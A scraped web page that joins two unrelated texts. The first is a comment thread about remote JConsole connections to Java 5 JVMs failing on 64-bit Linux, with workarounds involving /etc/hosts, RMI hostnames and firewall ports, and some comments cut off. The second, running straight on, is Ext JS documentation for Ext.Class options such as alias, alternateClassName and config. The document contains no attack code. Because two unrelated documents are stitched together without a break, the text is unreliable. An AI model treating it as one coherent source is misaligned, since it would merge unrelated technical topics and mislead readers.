PowerShell module means nothing more than to copy the module files to a folder in a computer. To load a module in small projects is pretty simple. You just need to use the Import-Module cmdlet. If you don’t specify the path of the module PowerShell will look in the environment variable $ENV:PSMODULEPATH and check if it is there and automatically will load it. In PowerShell 2.0 you need to explicitly the import-module in your profile. Further reading: Most of the code you will see that uses SMO does not leave the loading of assemblies to SQLPS, but instead uses the loadwithpartialname method. This method is deprecated because it doesn’t give you control of the version of SMO that will be loaded if you have several versions in your system. The choice of file is controlled by GAC*. On the other hand, using the ADD-Type can be a pain because you need to be explicit about the version and change your code. Let’s take a look at some examples: LoadWithPartialName The general way: But we also can check if there is any SMO installed and return an error if not, otherwise it will be loaded: Add-Type: General way: Testing: The recommend way is to use ADD-Type, but what is the best approach? Well, it depends. If you are dealing with several version of SMO and it’s not a problem for your PowerShell environment then loadwithpartialname will be easier; otherwise, use add-type. But always remember LoadwithpartialName is a deprecated method and in some point will be excluded from the framework Checking which version of SMO or SQLPS was loaded in the session By default, PowerShell loads some assemblies when you open a session. Of course, it needs some basic assemblies to work properly. SMO is a .NET library and it needs to be loaded. The same happens with SQLPS module. To find out which assemblies were loaded, you can use this code (credits to fellow PowerShell MVP Richard Siddaway – Assemblies loaded in PowerShell:) For our purposes, we just need to filter for SMO: Finding out the version of the SQLPS module is a little different. PowerShell has a cmdlet called Get-Module that shows all the information on the modules. Also it has a parameter to check whether a specific module was loaded: Also you can check what modules are available to load using the parameter – ListAvaliable The Get-Module cmdlet will search all the modules available in the Environment variable $Env:PSMODULEPATH, a special variable that contains all the paths for the installed modules and will list them for you. Determining the version of SQLPS that PowerShell will load If you use the name parameter, PowerShell will always check in the $env:psmodulepath variable and then will, according fellow PowerShell MVP Joel Bennet, import them in the following order: Path order, then alphabetic order, then highest version if you have side-by-side modules in the same folder (in PS5) That´s an interesting question that comes out in the comments on the SMO stairway, and I will give a different answer for SQLPS, which is a module, and SMO which is a group of assemblies. As we saw, if we use the parameter name in the import-module it will load the SQLPS in the order of the environment variable . So in this specific case we use the parameter -FullyQualifiedName Or even the parameter -name with the FQDN: The point is that you need to specify the path for the SQLPS module. Shawn Melton showed, in the comments, a very cool function to make the job easy: In this function, you can pass as a parameter the version you want to import and the default is 130. This example will load the highest SQLPS version We ended up with another version of Shawn´s function where you can choose the most recent SQLPS version by using a switch parameter -highest If you use the code that I included earlier on, it will only show you the assemblies that are already loaded in your session. If you use the loadwithpartialname method to load the SMO, this is controlled by the GAC* . If you want to load a specific version of SMO, I recommend that you should use ADD-Type and you can then specify which version will be loaded: Using the same idea from Shawn, we could think of doing something similar with SMO, but for this we would need to query the GAC: Let’s say we want to load the highest version SMO installed We could then develop this to speed it up by saving on the pipeline traffic. This is achieved by doing the selection within the Get-ChildItem cmdlet. You can read more about how modules work in PowerShell here: (Importing a PowerShell Module) *GAC or Global Assembly Cache is a machine-wide code where the assemblies are installed and stored to be shared with applications on the computer. Creating a Custom Type Accelerator for SMO You will sometimes find that when you load an assembly like SMO, that specifying the NET types is laborious. Type accelerators are a great help for getting around this. Type Accelerators are like shortcuts for .NET types. It can simplify your code and make it more intelligible if you use them. For instance [adsi] is a type accelerator for System.DirectoryServices.DirectoryEntry or [pscustomobject] for System.Management.Automation.PSObject. You can do the same for SMO This code shows the type accelerators currently defined in your session: To create a custom type accelerator you just need to add the key and the .net type: So for instance, to create a type accelerator for the SMO Server: Then I can easily access all properties and methods using the new type accelerator. Or also call a method: Now it´s just play around it and add in your PowerShell profile to load your custom SMO type accelerators Reference: Boe Prox – Quick Hits: Finding, Creating and Removing PowerShell Type Accelerators Conclusion There really isn’t a single best method of accessing SQL Server via PowerShell. What you use depends on what you need to achieve. Every approach has its advantages and disadvantages. In this article, I’ve described how to get up and running with each of these approaches, and I’ve tried to suggest the best ways of approaching the task.
https://www.red-gate.com/simple-talk/sql/database-administration/the-posh-dba-accessing-sql-server-from-powershell/
CC-MAIN-2019-35
refinedweb
2,294
59.13
Read / Write CSV file in Java - By Viral Patel on November 1, 2012 - If you want to work with Comma-separated Files (CSV) in Java, here’s a quick API for you. As Java doesn’t support parsing of CSV files natively, we have to rely on third party library. Opencsv is one of the best library available for this purpose. It’s open source and is shipped with Apache 2.0 licence which makes it possible for commercial use. Let’s us see different APIs to parse CSV file. Before that we will need certain tools for this example: Tools & Technologies Let’s get started. 1. Reading CSV file in Java We will use following CSV sample file for this example: File: sample.csv COUNTRY,CAPITAL,POPULATION India,New Delhi, 1.21B People's republic of China,Beijing, 1.34B United States,Washington D.C., 0.31B Read CSV file line by line: String csvFilename = "C:\\sample.csv"; CSVReader csvReader = new CSVReader(new FileReader(csvFilename)); String[] row = null; while((row = csvReader.readNext()) != null) { System.out.println(row[0] + " # " + row[1] + " # " + row[2]); } //... csvReader.close(); In above code snippet, we use readNext() method of CSVReader class to read CSV file line by line. It returns a String array for each value in row. It is also possible to read full CSV file once. The readAll() method of CSVReader class comes handy for this. String[] row = null; String csvFilename = "C:\\work\\sample.csv"; CSVReader csvReader = new CSVReader(new FileReader(csvFilename)); List content = csvReader.readAll(); for (Object object : content) { row = (String[]) object; System.out.println(row[0] + " # " + row[1] + " # " + row[2]); } //... csvReader.close(); The readAll() method returns a List of String[] for given CSV file. Both of the above code snippet prints output: Output COUNTRY # CAPITAL # POPULATION India # New Delhi # 1.21B People's republic of China # Beijing # 1.34B United States # Washington D.C. # 0.31B Use different separator and quote characters If you want to parse a file with other delimiter like semicolon (;) or hash (#), you can do so by calling a different constructor of CSVReader class: CSVReader reader = new CSVReader(new FileReader(file), ';') //or CSVReader reader = new CSVReader(new FileReader(file), '#') Also if your CSV file’s value is quoted with single quote (‘) instead of default double quote (“), then you can specify it in constructor: CSVReader reader = new CSVReader(new FileReader(file), ',', '\'') Also it is possible to skip certain lines from the top of CSV while parsing. You can provide how many lines to skip in CSVReader’s constructor. For example the below reader will skip 5 lines from top of CSV and starts processing at line 6. CSVReader reader = new CSVReader(new FileReader(file), ',', '\'', 5); 2. Writing CSV file in Java Creating a CSV file is as simple as reading one. All you have to do is it create the data list and write using CSVWriter class. Below is the code snippet where we write one line in CSV file. String csv = "C:\\output.csv"; CSVWriter writer = new CSVWriter(new FileWriter(csv)); String [] country = "India#China#United States".split("#"); writer.writeNext(country); writer.close(); We created object of class CSVWriter and called its writeNext() method. The writeNext() methods takes String [] as argument. You can also write a List of String[] to CSV directly. Following is code snippet for that. String csv = "C:\\output2.csv"; CSVWriter writer = new CSVWriter(new FileWriter(csv)); List data = new ArrayList (); data.add(new String[] {"India", "New Delhi"}); data.add(new String[] {"United States", "Washington D.C"}); data.add(new String[] {"Germany", "Berlin"}); writer.writeAll(data); writer.close(); We used writeAll() method of class CSVWriter to write a List of String[] as CSV file. 3. Mapping CSV with Java beans In above examples we saw how to parse CSV file and read the data in it. We retrieved the data as String array. Each record got mapped to String. It is possible to map the result to a Java bean object. For example we created a Java bean to store Country information. Country.java – The bean object to store Countries information. package net.viralpatel.java; public class Country { private String countryName; private String capital; public String getCountryName() { return countryName; } public void setCountryName(String countryName) { this.countryName = countryName; } public String getCapital() { return capital; } public void setCapital(String capital) { this.capital = capital; } } Now we can map this bean with Opencsv and read the CSV file. Check out below example: ColumnPositionMappingStrategy strat = new ColumnPositionMappingStrategy(); strat.setType(Country.class); String[] columns = new String[] {"countryName", "capital"}; // the fields to bind do in your JavaBean strat.setColumnMapping(columns); CsvToBean csv = new CsvToBean(); String csvFilename = "C:\\sample.csv"; CSVReader csvReader = new CSVReader(new FileReader(csvFilename)); List list = csv.parse(strat, csvReader); for (Object object : list) { Country country = (Country) object; System.out.println(country.getCapital()); } Check how we mapped Country class using ColumnPositionMappingStrategy. Also the method setColumnMapping is used to map individual property of Java bean to the CSV position. In this example we map first CSV value to countryName attribute and next to capital. 4. Dumping SQL Table as CSV OpenCSV also provides support to dump data from SQL table directly to CSV. For this we need ResultSet object. Following API can be used to write data to CSV from ResultSet. java.sql.ResultSet myResultSet = getResultSetFromSomewhere(); writer.writeAll(myResultSet, includeHeaders); The writeAll(ResultSet, boolean) method is utilized for this. The first argument is the ResultSet which you want to write to CSV file. And the second argument is boolean which represents whether you want to write header columns (table column names) to file or not. Download Source Code ReadWrite_CSV_Java_example.zip (356 KB) Get our Articles via Email. Enter your email address. Very helpful tutorials!! keep it up. Cheers Tu yahan par bhi pohach gaya ;) keep it up???????? Hi SIr, I want to display one row data into another row with same values . e.g. first row contains same value after reading program out file will be 2 rows same values plzz help me Hi SIr, I want to display one row data into another row with same values . e.g. first row contains same value after reading program output file will be 2 rows same values plzz help me..Thanks hi.. I want to know about how to map csv file with database.my project on J2EE so please help me.how to view ,update ,upload,delete csv file .thank you. Thank you for this post. A question: how would you deal with values that contain commas? For example if there’s a company name Some Company, Inc.. The usual parsing will interpret the comma between company and Inc as separate values, and this throws everything off. I have no control over the csv file — I need to work with it the way it is. Thanks! man after a long search I found you, and I hope you’ll relieve me of my frustration. Thing is I’ve .CSV files and .CSV data dumps from a website for which im an affiliate and when i’m trying to upload them to my wordpress website nothing is working! I just want to upload my .CSV and make galleries on my webpage, pls help me out with this; could you suggest any csv plugin that works with wordpress? I failed with everything available. I’m clueless! Thanks in advance Hello Mr Patel . Regards Prag Tyagi thanks It helped.….. How to update CSV files using openCSV ?? Hi Viral, Can you please tell me which is the best CSV reader provided by different opensource stuff. ex. Apace,Sourceforge have their csvReader API. In the same way,i need a CSVreader which can read and parse the file to a List of Records Objects.You can suggest any other also. Please reply me asap. Thanks in advance!! When I am using the above code, it is not fetching the complete data, however its fetching data from in between. Any pointers… You may want to look at Ostermiller CSV parser () I have been using it for the past 8+ years and it is too good. Hi Viral, I am facing a strange issue while reading the csv rows, the values are appended with special characters at the end of the String. I am reading and coverting to Bean using CsvToBean like this CSVReader csvReader = new CSVReader(new FileReader(chargebackFileName), ‘,’, ‘\”‘, ‘\\’, 2, false, true); Can you help with what can be the issue. Thanks Very Nyc Tutorials… Good tutuorial! Very helpful Very Hepful.. thanks a lot! Cool!! Hi Viral, Take a look at bindy for .csv files. It supports annotations as well. Great work ! how to validate date format in that .i dont know please tell me its urgent to me. vary useful one Thanks a lot. Very Use full guide. can openCSV be used in mutithreaded environment. hi dude, this information is very useful to me… keep it up and you have any idea about file API’s other than JAVA FILE API’s pls listing out in the site…. ok,not bad Hi Viral Patel, thank you so much. The article helped me to achieve a task. Others articles in others pages only gave me a headache. This is very helpful. Hello! Sir can you help me to write a code, in which i have to read a csv file , “Sumit”,”B.H Singh”,”1500″,”45″,”no”,”53″ “Pragya Rani”,”Romesh Kumar”,”1600″,”47″,”no”,”56″ “Ravina Singh”,”Jagjit Singh”,”1580″,”48″,”yes”,”76″ “Rajit Sharma”,”Hardik Sharma”,”1630″,”50″,”no”,”67″ “Shilpa Sharma”,”B.K Sharma”,”1590″,”42″,”no”,”67″ “Tanvi Verma”,”Suresh Singh”,”1620″,”38″,”yes”,”78″ “Ritu Sharma”,”Naresh Sharma”,”1530″,”35″,”yes”,”34″ “Anmol Garg”,”Atul Garg”,”1570″,”40″,”yes”,”62″ then sort it according to last column, then write it to another text file in sorted way. private static void readLineByLineExample() throws IOException { BufferedReader CSVFile = new BufferedReader(new FileReader(“C:\\Users\\Desktop\\std_db.sql”)); String dataRow = CSVFile.readLine(); // Read first line. // The while checks to see if the data is null. If // it is, we’ve hit the end of the file. If not, // process the data. while (dataRow != null) {(); // End the printout with a blank line. System.out.println(); } hi this is the code which i am runnig for cvs file reader..but its not working :( what is wrong? import java.io.*; import java.util.Arrays; public class CSVRead { public static void main(String[] arg) throws Exception { BufferedReader CSVFile = new BufferedReader(new FileReader( “D:\\aaTamilpersonnel\\12 may 2014\\part-00000(1)”)); String dataRow = CSVFile.readLine(); while (dataRow != null) { String[] dataArray = dataRow.split(“\t”); for (String item : dataArray) { System.out.print(item + “\t”); } System.out.println(); // Print the data line. dataRow = CSVFile.readLine(); // Read next line of data. } CSVFile.close(); // End the printout with a blank line. System.out.println(); } } This code will work . Make sure that you are using correct delimiter. Hi,its very helpful but is it possible to update particular cell value using open csv?keeping all row elements same ? Good time saving article can you just give an idea how to ceate xml from .csv file. u cant create xml from csv cz its impossible… :p Type mismatch: cannot convert from List to List Syntax error on token “add”, = expected after this token Syntax error on token “data”, VariableDeclaratorId expected after this token Syntax error on token “data”, VariableDeclaratorId expected after this token Syntax error on token “data”, VariableDeclaratorId expected after this token Syntax error on token “close”, Identifier expected after this token if my csv file is like this ID,NAME 1,xyz 2,pqr , 3,abc ————————END How i can get exact row where data is present??? that is 1,2,3 i must get at the end. Can you help me for this? Great tutorial, Thank you. However, I was wondering why they would have an overloaded constructor using different delimiter for CSVReader?. The class name implies that it is going to read Comma Separated Values, where Comma is the delimiter. Maybe DSVReader would have been a better name. Thank you Viral, this was very helpful. Reduced my lines of code significantly. Keep up the good job. Thanks for this post.. its very helpful…! nice work…
http://viralpatel.net/blogs/java-read-write-csv-file/
CC-MAIN-2015-18
refinedweb
2,021
68.36
Tutorial Request: drawing multi sided polygons w/ Bezier Curves - micahmicah last edited by gferreira! hello @micahmicah, regular polygons can be described using vectors. a vector has a length and an angle. in regular polygons: - all sides have the same length - the sum of all external angles is 360° here is a simple example in code: # define polygon parameters x, y = 300, 200 sides = 5 perimeter = 1640 angleStart = 0 angleTotal = 360 autoclose = True # calculate side length & angle side = perimeter / sides angleStep = abs(angleTotal / sides) # convert angles to radians! angleStep = radians(angleStep) angleStart = radians(angleStart) # create the polygon shape B = BezierPath() angle = angleStart for i in range(sides): # this is the crucial part: # use trigonometry to calculate point B # from point A, angle, and distance x += cos(angle) * side y += sin(angle) * side if i == 0: B.moveTo((x, y)) else: B.lineTo((x, y)) angle += angleStep if autoclose: B.closePath() fill(0, 1, 1) strokeWidth(30) lineCap('round') lineJoin('round') stroke(1, 0, 1) drawPath(B) from turtle import * x, y = 300, 200 sides = 7 side = 100 angleTotal = 360 angleStep = abs(angleTotal / sides) Screen() t = Turtle() for i in range(sides): t.forward(side) t.left(angleStep) done() ↳ run this script in Terminal or SublimeText - micahmicah last edited by Thank you so much!
https://forum.drawbot.com/topic/78/tutorial-request-drawing-multi-sided-polygons-w-bezier-curves/4?page=1
CC-MAIN-2019-04
refinedweb
212
50.16
I am working with the tensorflow-implementation from Keras and I can use it without issues, however, my IDE thinks that the keras submodule in tf does not exist. I am using anaconda where I install tensorflow and all my other libraries. I make sure that I select the right interpreter in PyCharm (all my other obscure libraries are imported without issue) and the base module from tf is imported without any problem (I get autocomplete etc.) but when I import "tensorflow.keras" the IDE complains that it cannot find the reference 'keras'. As said above, executing the files works without problem. Is there a way to tell the PyCharm that there is actually a keras submodule? PyCharm 2018.3.3 (Community Edition) Build #PC-183.5153.39, built on January 9, 2019 JRE: 1.8.0_152-release-1343-b26 amd64 JVM: OpenJDK 64-Bit Server VM by JetBrains s.r.o Linux 4.15.0-43-generic Hi, As a first troubleshooting step, can you try to find where the keras module is physically located in your packages directories, and check if this directory is present in the sys.path of your interpreter? Also, please try to open python console and do the import from there. I have the same problem. I use virtualenv and it is in "env" directory. From PyCharm's Python Console it works, though the completion is not as expected. The code works with the following import: from tensorflow.keras import backend as K from tensorflow.keras.layers import Lambda, Input, Flatten from tensorflow.keras.models import Model But PyCharm shows "Unresolved reference" error. My workaround is this: import tensorflow as tf keras = tf.keras K = keras.backend KL = keras.layers Lambda, Input, Flatten = KL.Lambda, KL.Input, KL.Flatten Model = keras.Model Hey Adam, Yes, I can reproduce the issue, but please note that it's expected in some limited cases. The tooltip for that inspection says: "This inspection detects names that should resolve but don't. Due to dynamic dispatch and duck typing, this is possible in a limited but useful number of cases. Top-level and class-level items are supported better than instance items." So another workaround would be to disable that inspection. Hi Andrey, That import is working from python console in PyCharm. I think yesterday (but sadly not today) my PyCharm was able to resolve this reference. I've found workaround. Instead of do import it as: Same error here, cannot autocomplete in code but work fine in python console, the work arounds posted here didn't help. I'm using tensorflow 2.0 btw. In tensorflow 2.0 you can import keras using `from tensorflow.python import keras` and it will autocomplete
https://intellij-support.jetbrains.com/hc/en-us/community/posts/360002486739-PyCharm-cannot-import-tensorflow-keras
CC-MAIN-2019-22
refinedweb
454
60.82
Every time I've used xgboost import pandas as pd from sklearn import datasets import xgboost as xgb iris = datasets.load_iris() dtrain = xgb.DMatrix(iris.data, label = iris.target) params = {'max_depth': 10, 'min_child_weight': 0, 'gamma': 0, 'lambda': 0, 'alpha': 0} bst = xgb.train(params, dtrain) [11:08:18] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 16 extra nodes, 0 pruned nodes, max_depth=5 You will have pruned nodes using regularization! Use the gammaparameter! The objective functions contains two parts: training loss and regularization. The regularisation in XGBoost is controlled by three parameters: alpha, beta and gamma (doc): alpha [default=0] L1 regularization term on weights, increase this value will make model more conservative. lambda [default=1] L2 regularization term on weights, increase this value will make model more conservative. gamma [default=0] minimum loss reduction required to make a further partition on a leaf node of the tree. the larger, the more conservative the algorithm will be. range: [0,∞] alpha and beta are just L1 and L2 penalties on the weights and should not affect pruning. BUT gamma is THE parameter to tune to get pruned nodes. You should increase it to get pruned nodes. Watch out that it is dependent of the objective function and that it could require value as high as 10000 or more to obtain pruned nodes. Tuning gamma is great! it will make XGBoost to converge! meaning that after a certain number of iterations the training and testing score will not change in the following iterations (all the nodes of the new trees will be pruned). At the end it is a great switch to control overfit! See Introduction to Boosted Trees to get the exact definition of gamma.
https://codedump.io/share/wIbUv3Ugu3Tu/1/output-something-other-than-390-pruned-nodes39
CC-MAIN-2017-39
refinedweb
287
66.94
. The private class must not be a nested class or it will be exported too if you added the _EXPORT keyword to the parent class.. For binary compatibility reasons, try to avoid inline code in headers. Specifically no inline constructor or destructor. If ever you add inline code please note the following: QT_NO_CAST_FROM_ASCII, QT_NO_CAST_TO_ASCII, QT_NO_KEYWORD. So don't forget QLatin1String. static_castif types are known. Use qobject_castinstead of dynamic_castif types are QObject based. dynamic_cast is not only slower, but is also unreliable across shared libraries. These recommendations are also true for code that are not in headers. Try to avoid meaningless boolean parameters in functions. Example of a bad boolean argument: static QString KApplication::makeStdCaption(const QString .: #include <kfoobase.h> Mart 2006
https://techbase.kde.org/index.php?title=Policies/Library_Code_Policy&oldid=1604
CC-MAIN-2015-22
refinedweb
121
53.07
- NAME - SYNOPSIS - DESCRIPTION - METHODS - AUTHOR - BUGS NAME Catalyst::TraitFor::Request::REST::ForBrowsers - A request trait for REST and browsers SYNOPSIS package MyApp; use Moose; use namespace::autoclean; use Catalyst; use CatalystX::RoleApplicator; extends 'Catalyst'; __PACKAGE__->apply_request_class_roles(qw[ Catalyst::TraitFor::Request::REST::ForBrowsers ]); DESCRIPTION. METHODS This class provides the following methods: $request->method). $request->looks_like_browser: If the request includes a header "X-Request-With" set to either "HTTP.Request" or "XMLHttpRequest", this returns false. The assumption is that if you're doing XHR, you don't want the request treated as if it comes from a browser. If the client makes a GET request with a query string parameter "content-type", and that type is not an HTML type, it is not a browser. If the client provides an Accept header which includes "*/*" as an accepted content type, the client is a browser. Specifically, it is IE7, which submits an Accept header of "*/*". IE7's Accept header does not include any html types like "text/html". If the client provides an Accept header and accepts either "text/html" or "application/xhtml+xml" it is a browser. If it provides an Accept header of any sort that doesn't match one of the above criteria, it is not a browser. The default is that the client is a browser. This all works well for my apps, but read it carefully to make sure it meets your expectations before using it. AUTHOR Dave Rolsky, <autarch@urth.org> BUGS.
https://metacpan.org/pod/release/JJNAPIORK/Catalyst-Action-REST-1.20/lib/Catalyst/TraitFor/Request/REST/ForBrowsers.pm
CC-MAIN-2018-51
refinedweb
245
55.74
本文出处: I see a very similar effect. I have one machine running Debian amd64 sarge that I am unable to connect to - I can connect locally using local connection. I can even connect "remotely" on the same machine by using 127.0.0.1 or it's IP address. I just cannot connect remotely from another machine - I get the same "Connection Failed". A netstat shows an ESTABLISHed connection to the correct port, the connection will not go TIME_WAIT until I click cancel on the connection window (even though it says Connection failed). I've tried both Debian i386/amd64 and solaris 10 beta 72 jconsoles (amd64 1.6.0 build) without success. A i386 machine with the exact same java -D args will allow connections. Its very very strange. java version: java version "1.5.0" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0-b64) Java HotSpot(TM) 64-Bit Server VM (build 1.5.0-b64, mixed mode) /usr/lib/j2sdk1.5-sun/bin/java -server -Djava.awt.headless=true -Xmx896m -XX:+PrintGCDetails -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=8400 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.endorsed.dirs=/usr/share/tomcat5/common/endorsed -classpath /usr/lib/j2sdk1.5-sun/lib/tools.jar:/usr/lib/j2sdk1.5-sun/jre//lib/jcert.jar:/usr/lib/j2sdk1.5-sun/jre//lib/jnet.jar:/usr/lib/j2sdk1.5-sun/jre//lib/jsse.jar:/usr/share/tomcat5/bin/bootstrap.jar:/usr/share/tomcat5/bin/commons-logging-api.jar -Dcatalina.base=/var/lib/tomcat5 -Dcatalina.home=/usr/share/tomcat5 -Djava.io.tmpdir=/var/lib/tomcat5/temp org.apache.catalina.startup.Bootstrap -config /etc/tomcat5/server0.xml start Submitted On21-DEC-2004 bclbob Futher investigation Java code: public class Sleep { public static void main( String[] args) { try { Thread.sleep(10000000); } catch (Exception e) { // eat } } } java cmd line: java -Dcom.sun.management.jmxremote.port=8900 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false Sleep still causes the same issue on the amd64 machine, but connects fine on i386. amd64 java -version: java version "1.5.0" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0-b64) Java HotSpot(TM) 64-Bit Server VM (build 1.5.0-b64, mixed mode) i386 java -version: java version "1.5.0" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0-b64) Java HotSpot(TM) Client VM (build 1.5.0-b64, mixed mode) Submitted On29-DEC-2004 opty Same problem here on Linux Mandrake 10.1 for x86-64 (Xeon EM64T here), when looking on jconsole localy the remote jconsole connection thread is at java.net.SocketInputStream.socketRead0() for for few seconds before terminating, so the there have been a connection but something failed while communicating... Submitted On06-JAN-2005 bclbob Still an issue on Linux amd64 with SR1 java -version java version "1.5.0_01" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_01-b08) Java HotSpot(TM) 64-Bit Server VM (build 1.5.0_01-b08, mixed mode) Can't connect remotely from Windows or Linux or Solaris 10 b72. Submitted On14-JAN-2005 masterzen666 I confirm the problem: client on debian/sarge i386 server on debian/sarge amd64 (EM64T) Same VM running on client & server (except 64bit one for server): java version "1.5.0_01" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_01-b08) Java HotSpot(TM) 64-Bit Server VM (build 1.5.0_01-b08, mixed mode) Analysis of a network trace seems to show that the remote part sends 127.0.0.1 as IP address. Analysis of a network trace taken on 'lo' (on the client) shows that the jconsole tries to connect to a port that is not open on the client (because it is open on the server). It might be related to the /etc/hosts file and the hostname to IP conversion... I found the culprit and a workaround: my /etc/hosts was: 127.0.0.1 localhost localhost.localdomain server4 Changed that to 127.0.0.1 localhost localhost.localdomain 192.168.0.230 server4 fixed the problem.... Submitted On19-JAN-2005 bclbob Thanks masterzen666 - that worked for me! great work Submitted On21-JAN-2005 marcoesch I dont think it is related to name resolution. I am experiencing the same problem. On the server I can see the socket going in to LISTEN mode on the specified port. When the client tries to connect I can see it going into ESTABLISHED with ip address from the client running jconsole ... but still get connection fialed on the client. tcp 0 0 *:9930 *:* LISTEN tcp 0 0 ::ffff:10.107.0.15:9930 ::ffff:10.107.0.25:1641 ESTABLISHED Submitted On04-FEB-2005 opty The above evaluation trick for /etc/hosts works with a straight connection, but it won Submitted On14-FEB-2005 bjerkz The "trick" with /etc/hosts solves it for me, too. Thanks! Submitted On03-MAR-2005 opty /etc/hosts doesn Submitted On03-MAR-2005 opty /etc/hosts does not resolve when using NAT or SSH tunneling Submitted On03-MAR-2005 Caffeine0001 If you are behind a NAT or firewall and having problems, see the second reply of and. Please also add this to the JConsole FAQ. Submitted On15-FEB-2007 I am running Ubuntu Edgy and I definitely see this problem. I don't know whose fault it is, but it's definitely a bug. I have a pretty comprehensive writeup including a workaround here: Submitted On19-FEB-2007 HolgerK If have the same problem even with proper hostname setup. JDK 1.5.0.11, Linux/i386, two machines. I can connect to the remote port via "telnet server port", but jconsole reports "connection failed" when started on client (oder server). BTW: jmxremote documentation is inconsistant: 1.) gui screwup: I found no place how users and roles relate. all documentation seems to use these terms als synonyms. the remote dialog in jconsole should read "rolename", not "username" in this case. 2.) typo: the commed in jmxremote.password reads monitorRole and measureRole. Submitted On29-MAR-2007 SheepShepherd For my RedHat AS3 the trick with /etc/hosts was not enough until I changed my host name with "hostname -v <name_of_my_machine>" command (root privileges are required). Submitted On26-JUL-2007 mipito I'm having the same problem on a linux box and the 'hostname' fix doesn't help. Issuing 'hostname -i" gives me the true ip. I fire up the process to be monitored on the server, ssl & authentication disabled. On the client (a pc) i fire up jconsole and the connection is established as displayed by netstat, but for some reason it ends up in "connection failed". What is jconsole trying to do at this point? I can connect fine to that port using telnet. Submitted On27-JUL-2007 mipito Ok, the problem i was running into (see my previous comment) and is now resolved is that the jvm you're trying to connect to actually exposes *two* ports, the one specified via -Dcom.sun.management.jmxremote.port, and some other one. The 2nd one is random, but jconsole wants to connect to it, so if you have a firewall, and you've only opened up the above port, you're hosed. I don't know if it's possible to specify both ports on the cmd line, which is what you'd want to do if you have to poke holes in your firewall. I believe there is a way to write code to get around this problem, but that's a pain, in particular when one is not in control of that code. Submitted On22-AUG-2008 r_d adding -Djava.rmi.server.hostname=<host ip> should help resolve this problem. PLEASE NOTE: JDK6 is formerly known as Project Mustang
https://blog.csdn.net/iteye_8595/article/details/81896433
CC-MAIN-2019-04
refinedweb
1,308
58.79
I am trying to use the dusk2dawn library, and have been unable to get it to function how I expect. It is supposed to return sunset and sunrise times of minutes from midnight. It is returning -169 for sunrise and 531 for sunset. This was the same if I used the time from the RTC or entered it manually. What am I doing wrong? #include <Dusk2Dawn.h> #include "RTClib.h" RTC_DS3231 rtc; void setup() { Serial.begin (9600); while (!Serial); // wait for serial port to connect. Needed for native USB if (rtc.lostPower()) { Serial.println("RTC lost power, let's set the time!"); rtc.adjust(DateTime(F(__DATE__), F(__TIME__))); } } void loop() { int hours; DateTime now = rtc.now(); hours = now.hour() * 60 + now.minute(); // minutes since midnight Dusk2Dawn fburg(38.300713, 77.375166,-5); int rise = fburg.sunrise(now.year(), now.month(), now.day(), true); int set = fburg.sunset(now.year(), now.month(), now.day(), true); Serial.println(rise); Serial.println(set); delay(10000); }
https://forum.arduino.cc/t/dusk2dawn-issue/660712
CC-MAIN-2021-39
refinedweb
163
64.17
is a low level factory that is used by Ext.define and should not be used directly in application code. The configs of this class are intended to be used in Ext.define calls to describe the class you are declaring. For example: Ext.define('App.util.Thing', { extend: 'App.util.Other', alias: 'util.thing', config: { foo: 42 } }); Ext.Class is the factory and not the superclass of everything. For the base class that all classes inherit from, see Ext.Base. List of short aliases for class names. An alias consists of a namespace and a name concatenated by a period as <namespace>.<name> A list of namespaces and the usages are: Most useful for defining xtypes for widgets: Ext.define('MyApp.CoolPanel', { extend: 'Ext.panel.Panel', alias: ['widget.coolpanel'], title: 'Yeah!' }); // Using Ext.create Ext.create('widget.coolpanel'); // Using the shorthand for defining widgets by xtype Ext.widget('panel', { items: [ {xtype: 'coolpanel', html: 'Foo'}, {xtype: 'coolpanel', html: 'Bar'} ] }); Defines alternate names for this class. For example: Ext.define('Developer', { alternateClassName: ['Coder', 'Hacker'], code: function(msg) { alert('Typing... ' + msg); } }); var joe = Ext.create('Developer'); joe.code('stackoverflow'); var rms = Ext.create('Hacker'); rms.code('hack hack'); This configuration works in a very similar manner to the config option. The difference is that the configurations are only ever processed when the first instance of that class is created. The processed value is then stored on the class prototype and will not be processed on subsequent instances of the class. Getters/setters will be generated in exactly the same way as config. This option is useful for expensive objects that can be shared across class instances. The class itself ensures that the creation only occurs once. List of configuration options with their default values. Note: You need to make sure Ext.Base#initConfig is called from your constructor if you are defining your own class or singleton, unless you are extending a Component. Otherwise the generated getter and setter methods will not be initialized. Each config item will have its own setter and getter method automatically generated inside the class prototype during class creation time, if the class does not have those methods explicitly defined. As an example, let's convert the name property of a Person class to be a config item, then add extra age and gender items. Ext.define('My.sample.Person', { config: { name: 'Mr. Unknown', age: 0, gender: 'Male' }, constructor: function(config) { this.initConfig(config); return this; } // ... }); Within the class, this.name still has the default value of "Mr. Unknown". However, it's now publicly accessible without sacrificing encapsulation, via setter and getter methods. var jacky = new My.sample.Person({ name: "Jacky", age: 35 }); alert(jacky.getAge()); // alerts 35 alert(jacky.getGender()); // alerts "Male" jacky.setName("Mr. Nguyen"); alert(jacky.getName()); // alerts "Mr. Nguyen" Notice that we changed the class constructor to invoke this.initConfig() and pass in the provided config object. Two key things happened: Beside storing the given values, throughout the frameworks, setters generally have two key responsibilities: age must be a valid positive number, and fire an 'agechange' if the value is modified. Ext.define('My.sample.Person', { config: { // ... }, constructor: { // ... }, applyAge: function(age) { if (typeof age !== 'number' || age < 0) { console.warn("Invalid age, must be a positive number"); return; } return age; }, updateAge: function(newAge, oldAge) { // age has changed from "oldAge" to "newAge" this.fireEvent('agechange', this, newAge, oldAge); } // ... }); var jacky = new My.sample.Person({ name: "Jacky", age: 'invalid' }); alert(jacky.getAge()); // alerts 0 alert(jacky.setAge(-100)); // alerts 0 alert(jacky.getAge()); // alerts 0 alert(jacky.setAge(35)); // alerts 0 alert(jacky.getAge()); // alerts 35 In other words, when leveraging the config feature, you mostly never need to define setter and getter methods explicitly. Instead, "apply" and "update" methods should be implemented where necessary. Your code will be consistent throughout and only contain the minimal logic that you actually care about. When it comes to inheritance, the default config of the parent class is automatically, recursively merged with the child's default config. The same applies for 